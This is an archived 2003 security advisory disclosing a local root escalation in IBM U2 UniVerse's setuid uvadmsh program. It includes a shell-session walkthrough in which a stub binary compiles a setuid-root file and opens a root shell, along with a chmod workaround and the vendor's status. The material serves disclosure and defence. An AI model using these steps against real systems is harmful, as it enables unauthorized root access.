[VulnWatch] SRT2003-07-07-0833 - IBM U2 UniVerse users with uvadm rights can take root via uvadmsh

From: KF (dotslash_at_snosoft.com)
Date: 07/16/03

  • Next message: KF: "[VulnWatch] SRT2003-07-07-0913 - Abnormal suid behavior in several applications"
    Date: Tue, 15 Jul 2003 20:43:39 -0400
    To: bugtraq <bugtraq@securityfocus.com>

    Thanks to IBM for being so receptive with these issues.

    For those of you that have requested we revive the old "Snosoft"
    advisories we have begun placing our legacy advisories at
    http://www.secnetops.biz as time permits.


    Secure Network Operations, Inc. http://www.secnetops.com
    Strategic Reconnaissance Team research@secnetops.com
    Team Lead Contact kf@secnetops.com

    Our Mission:
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    Quick Summary:
    Advisory Number : SRT2003-07-07-0833
    Product : IBM U2 UniVerse
    Version : Version <= ?
    Vendor : http://ibm.com/software/data/u2/universe/
    Class : local
    Criticality : High (to UniVerse servers with local users)
    Operating System(s) : Only confirmed on Linux (other unix based?)

    High Level Explanation
    High Level Description : users with uvadm rights can take root
    What to do : chmod -s /usr/ibm/uv/bin/uvadmsh

    Technical Details
    Proof Of Concept Status : SNO Does have PoC code for this issue.
    Low Level Description :

    UniVerse is an extended relational database designed for embedding in
    vertical applications. Its nested relational data model results in
    intuitive data modeling and fewer resulting tables. UniVerse provides
    data access, storage and management capabilities across Microsoft®
    Windows® NT, Linux and UNIplatform.

    The creation and use of the Unix user 'uvadm' is optional for UniVerse.
    It is not required for the successfull installation, configuration and
    administration of UniVerse. The intended use of uvadm is to allow a
    selected, specific non-root user to perform all aspects of UniVerse

    The uvadmsh program checks the users name against the string "uvadm"
    which means in order to exploit this issue you need to have access to
    the user uvadm.

    [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp
    strcmp("kf", "uvadm") = -1

    [uvadm@vegeta uvadm]$ id
    uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)

    You will note that with the proper uid the binary begins looking for
    the command line option "-uv.install" which is the path to a binary
    file to execute.

    [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp
    strcmp("uvadm", "uvadm") = 0
    strcmp("-uv.install", "-uv.install") = 0

    This condition is fairly easy to take advantage of as you can see here.

    [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
    system("cc -o /tmp/owned /tmp/owned.c");
    system("chmod 4755 /tmp/owned");

    [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
    [uvadm@vegeta uvadm]$ cat > /tmp/owned.c

    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    ls: /tmp/owned: No such file or directory

    [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    -rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned

    [uvadm@vegeta uvadm]$ /tmp/owned
    [root@vegeta uvadm]# id
    uid=0(root) gid=503(uvadm) groups=503(uvadm)

    Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh

    Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user
    to perform all of the uvadmsh functions.

    Vendor Status : The IBM U2 staff will have this issue resolved
    in a future release of IBM U2. Patches may also be supplied on a per
    client basis at IBM's disgression.

    Bugtraq URL : to be assigned

    This advisory was released by Secure Network Operations,Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Exploit source code is no longer released
    in our advisories. Contact research@secnetops.com for information on how
    to obtain exploit information.

  • Next message: KF: "[VulnWatch] SRT2003-07-07-0913 - Abnormal suid behavior in several applications"